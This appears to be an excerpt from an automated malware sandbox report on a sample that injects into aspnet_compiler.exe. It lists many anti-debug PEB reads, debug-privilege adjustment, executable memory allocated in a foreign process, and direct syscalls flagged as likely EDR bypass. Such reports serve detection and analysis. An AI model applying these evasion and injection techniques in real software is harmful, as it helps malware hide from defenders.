                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DE609 mov eax, dword ptr fs:[00000030h]4_2_017DE609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177260B mov eax, dword ptr fs:[00000030h]4_2_0177260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177260B mov eax, dword ptr fs:[00000030h]4_2_0177260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177260B mov eax, dword ptr fs:[00000030h]4_2_0177260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177260B mov eax, dword ptr fs:[00000030h]4_2_0177260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177260B mov eax, dword ptr fs:[00000030h]4_2_0177260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177260B mov eax, dword ptr fs:[00000030h]4_2_0177260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177260B mov eax, dword ptr fs:[00000030h]4_2_0177260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DE6F2 mov eax, dword ptr fs:[00000030h]4_2_017DE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DE6F2 mov eax, dword ptr fs:[00000030h]4_2_017DE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DE6F2 mov eax, dword ptr fs:[00000030h]4_2_017DE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DE6F2 mov eax, dword ptr fs:[00000030h]4_2_017DE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E06F1 mov eax, dword ptr fs:[00000030h]4_2_017E06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E06F1 mov eax, dword ptr fs:[00000030h]4_2_017E06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0179A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179A6C7 mov eax, dword ptr fs:[00000030h]4_2_0179A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017966B0 mov eax, dword ptr fs:[00000030h]4_2_017966B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179C6A6 mov eax, dword ptr fs:[00000030h]4_2_0179C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01764690 mov eax, dword ptr fs:[00000030h]4_2_01764690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01764690 mov eax, dword ptr fs:[00000030h]4_2_01764690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0182866E mov eax, dword ptr fs:[00000030h]4_2_0182866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0182866E mov eax, dword ptr fs:[00000030h]4_2_0182866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017EC97C mov eax, dword ptr fs:[00000030h]4_2_017EC97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A096E mov eax, dword ptr fs:[00000030h]4_2_017A096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A096E mov edx, dword ptr fs:[00000030h]4_2_017A096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A096E mov eax, dword ptr fs:[00000030h]4_2_017A096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01786962 mov eax, dword ptr fs:[00000030h]4_2_01786962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01786962 mov eax, dword ptr fs:[00000030h]4_2_01786962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01786962 mov eax, dword ptr fs:[00000030h]4_2_01786962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E0946 mov eax, dword ptr fs:[00000030h]4_2_017E0946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0182A9D3 mov eax, dword ptr fs:[00000030h]4_2_0182A9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E892A mov eax, dword ptr fs:[00000030h]4_2_017E892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F892B mov eax, dword ptr fs:[00000030h]4_2_017F892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017EC912 mov eax, dword ptr fs:[00000030h]4_2_017EC912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01758918 mov eax, dword ptr fs:[00000030h]4_2_01758918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01758918 mov eax, dword ptr fs:[00000030h]4_2_01758918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DE908 mov eax, dword ptr fs:[00000030h]4_2_017DE908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DE908 mov eax, dword ptr fs:[00000030h]4_2_017DE908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017929F9 mov eax, dword ptr fs:[00000030h]4_2_017929F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017929F9 mov eax, dword ptr fs:[00000030h]4_2_017929F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017EE9E0 mov eax, dword ptr fs:[00000030h]4_2_017EE9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A9D0 mov eax, dword ptr fs:[00000030h]4_2_0176A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A9D0 mov eax, dword ptr fs:[00000030h]4_2_0176A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A9D0 mov eax, dword ptr fs:[00000030h]4_2_0176A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A9D0 mov eax, dword ptr fs:[00000030h]4_2_0176A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A9D0 mov eax, dword ptr fs:[00000030h]4_2_0176A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A9D0 mov eax, dword ptr fs:[00000030h]4_2_0176A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017949D0 mov eax, dword ptr fs:[00000030h]4_2_017949D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F69C0 mov eax, dword ptr fs:[00000030h]4_2_017F69C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834940 mov eax, dword ptr fs:[00000030h]4_2_01834940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E89B3 mov esi, dword ptr fs:[00000030h]4_2_017E89B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E89B3 mov eax, dword ptr fs:[00000030h]4_2_017E89B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E89B3 mov eax, dword ptr fs:[00000030h]4_2_017E89B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017729A0 mov eax, dword ptr fs:[00000030h]4_2_017729A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017729A0 mov eax, dword ptr fs:[00000030h]4_2_017729A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017729A0 mov eax, dword ptr fs:[00000030h]4_2_017729A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017729A0 mov eax, dword ptr fs:[00000030h]4_2_017729A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017729A0 mov eax, dword ptr fs:[00000030h]4_2_017729A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017729A0 mov eax, dword ptr fs:[00000030h]4_2_017729A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017729A0 mov eax, dword ptr fs:[00000030h]4_2_017729A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017729A0 mov eax, dword ptr fs:[00000030h]4_2_017729A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017729A0 mov eax, dword ptr fs:[00000030h]4_2_017729A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017729A0 mov eax, dword ptr fs:[00000030h]4_2_017729A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017729A0 mov eax, dword ptr fs:[00000030h]4_2_017729A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017729A0 mov eax, dword ptr fs:[00000030h]4_2_017729A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017729A0 mov eax, dword ptr fs:[00000030h]4_2_017729A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017609AD mov eax, dword ptr fs:[00000030h]4_2_017609AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017609AD mov eax, dword ptr fs:[00000030h]4_2_017609AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01804978 mov eax, dword ptr fs:[00000030h]4_2_01804978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01804978 mov eax, dword ptr fs:[00000030h]4_2_01804978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017EE872 mov eax, dword ptr fs:[00000030h]4_2_017EE872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017EE872 mov eax, dword ptr fs:[00000030h]4_2_017EE872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F6870 mov eax, dword ptr fs:[00000030h]4_2_017F6870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F6870 mov eax, dword ptr fs:[00000030h]4_2_017F6870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01790854 mov eax, dword ptr fs:[00000030h]4_2_01790854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01764859 mov eax, dword ptr fs:[00000030h]4_2_01764859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01764859 mov eax, dword ptr fs:[00000030h]4_2_01764859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01772840 mov ecx, dword ptr fs:[00000030h]4_2_01772840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018308C0 mov eax, dword ptr fs:[00000030h]4_2_018308C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179A830 mov eax, dword ptr fs:[00000030h]4_2_0179A830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01782835 mov eax, dword ptr fs:[00000030h]4_2_01782835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01782835 mov eax, dword ptr fs:[00000030h]4_2_01782835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01782835 mov eax, dword ptr fs:[00000030h]4_2_01782835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01782835 mov ecx, dword ptr fs:[00000030h]4_2_01782835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01782835 mov eax, dword ptr fs:[00000030h]4_2_01782835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01782835 mov eax, dword ptr fs:[00000030h]4_2_01782835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0182A8E4 mov eax, dword ptr fs:[00000030h]4_2_0182A8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017EC810 mov eax, dword ptr fs:[00000030h]4_2_017EC810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179C8F9 mov eax, dword ptr fs:[00000030h]4_2_0179C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179C8F9 mov eax, dword ptr fs:[00000030h]4_2_0179C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E8C0 mov eax, dword ptr fs:[00000030h]4_2_0178E8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180483A mov eax, dword ptr fs:[00000030h]4_2_0180483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180483A mov eax, dword ptr fs:[00000030h]4_2_0180483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017EC89D mov eax, dword ptr fs:[00000030h]4_2_017EC89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01760887 mov eax, dword ptr fs:[00000030h]4_2_01760887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175CB7E mov eax, dword ptr fs:[00000030h]4_2_0175CB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01758B50 mov eax, dword ptr fs:[00000030h]4_2_01758B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01814BB0 mov eax, dword ptr fs:[00000030h]4_2_01814BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01814BB0 mov eax, dword ptr fs:[00000030h]4_2_01814BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F6B40 mov eax, dword ptr fs:[00000030h]4_2_017F6B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F6B40 mov eax, dword ptr fs:[00000030h]4_2_017F6B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180EBD0 mov eax, dword ptr fs:[00000030h]4_2_0180EBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178EB20 mov eax, dword ptr fs:[00000030h]4_2_0178EB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178EB20 mov eax, dword ptr fs:[00000030h]4_2_0178EB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DEB1D mov eax, dword ptr fs:[00000030h]4_2_017DEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DEB1D mov eax, dword ptr fs:[00000030h]4_2_017DEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DEB1D mov eax, dword ptr fs:[00000030h]4_2_017DEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DEB1D mov eax, dword ptr fs:[00000030h]4_2_017DEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DEB1D mov eax, dword ptr fs:[00000030h]4_2_017DEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DEB1D mov eax, dword ptr fs:[00000030h]4_2_017DEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DEB1D mov eax, dword ptr fs:[00000030h]4_2_017DEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DEB1D mov eax, dword ptr fs:[00000030h]4_2_017DEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DEB1D mov eax, dword ptr fs:[00000030h]4_2_017DEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834B00 mov eax, dword ptr fs:[00000030h]4_2_01834B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178EBFC mov eax, dword ptr fs:[00000030h]4_2_0178EBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01768BF0 mov eax, dword ptr fs:[00000030h]4_2_01768BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01768BF0 mov eax, dword ptr fs:[00000030h]4_2_01768BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01768BF0 mov eax, dword ptr fs:[00000030h]4_2_01768BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017ECBF0 mov eax, dword ptr fs:[00000030h]4_2_017ECBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01828B28 mov eax, dword ptr fs:[00000030h]4_2_01828B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01828B28 mov eax, dword ptr fs:[00000030h]4_2_01828B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01780BCB mov eax, dword ptr fs:[00000030h]4_2_01780BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01780BCB mov eax, dword ptr fs:[00000030h]4_2_01780BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01780BCB mov eax, dword ptr fs:[00000030h]4_2_01780BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01760BCD mov eax, dword ptr fs:[00000030h]4_2_01760BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01760BCD mov eax, dword ptr fs:[00000030h]4_2_01760BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01760BCD mov eax, dword ptr fs:[00000030h]4_2_01760BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0182AB40 mov eax, dword ptr fs:[00000030h]4_2_0182AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01808B42 mov eax, dword ptr fs:[00000030h]4_2_01808B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770BBE mov eax, dword ptr fs:[00000030h]4_2_01770BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770BBE mov eax, dword ptr fs:[00000030h]4_2_01770BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01814B4B mov eax, dword ptr fs:[00000030h]4_2_01814B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01814B4B mov eax, dword ptr fs:[00000030h]4_2_01814B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180EB50 mov eax, dword ptr fs:[00000030h]4_2_0180EB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01832B57 mov eax, dword ptr fs:[00000030h]4_2_01832B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01832B57 mov eax, dword ptr fs:[00000030h]4_2_01832B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01832B57 mov eax, dword ptr fs:[00000030h]4_2_01832B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01832B57 mov eax, dword ptr fs:[00000030h]4_2_01832B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834A80 mov eax, dword ptr fs:[00000030h]4_2_01834A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DCA72 mov eax, dword ptr fs:[00000030h]4_2_017DCA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DCA72 mov eax, dword ptr fs:[00000030h]4_2_017DCA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179CA6F mov eax, dword ptr fs:[00000030h]4_2_0179CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179CA6F mov eax, dword ptr fs:[00000030h]4_2_0179CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179CA6F mov eax, dword ptr fs:[00000030h]4_2_0179CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01766A50 mov eax, dword ptr fs:[00000030h]4_2_01766A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01766A50 mov eax, dword ptr fs:[00000030h]4_2_01766A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01766A50 mov eax, dword ptr fs:[00000030h]4_2_01766A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01766A50 mov eax, dword ptr fs:[00000030h]4_2_01766A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01766A50 mov eax, dword ptr fs:[00000030h]4_2_01766A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01766A50 mov eax, dword ptr fs:[00000030h]4_2_01766A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01766A50 mov eax, dword ptr fs:[00000030h]4_2_01766A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770A5B mov eax, dword ptr fs:[00000030h]4_2_01770A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770A5B mov eax, dword ptr fs:[00000030h]4_2_01770A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179CA38 mov eax, dword ptr fs:[00000030h]4_2_0179CA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01784A35 mov eax, dword ptr fs:[00000030h]4_2_01784A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01784A35 mov eax, dword ptr fs:[00000030h]4_2_01784A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178EA2E mov eax, dword ptr fs:[00000030h]4_2_0178EA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179CA24 mov eax, dword ptr fs:[00000030h]4_2_0179CA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017ECA11 mov eax, dword ptr fs:[00000030h]4_2_017ECA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179AAEE mov eax, dword ptr fs:[00000030h]4_2_0179AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179AAEE mov eax, dword ptr fs:[00000030h]4_2_0179AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01760AD0 mov eax, dword ptr fs:[00000030h]4_2_01760AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01794AD0 mov eax, dword ptr fs:[00000030h]4_2_01794AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01794AD0 mov eax, dword ptr fs:[00000030h]4_2_01794AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017B6ACC mov eax, dword ptr fs:[00000030h]4_2_017B6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017B6ACC mov eax, dword ptr fs:[00000030h]4_2_017B6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017B6ACC mov eax, dword ptr fs:[00000030h]4_2_017B6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01768AA0 mov eax, dword ptr fs:[00000030h]4_2_01768AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01768AA0 mov eax, dword ptr fs:[00000030h]4_2_01768AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017B6AA4 mov eax, dword ptr fs:[00000030h]4_2_017B6AA4
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
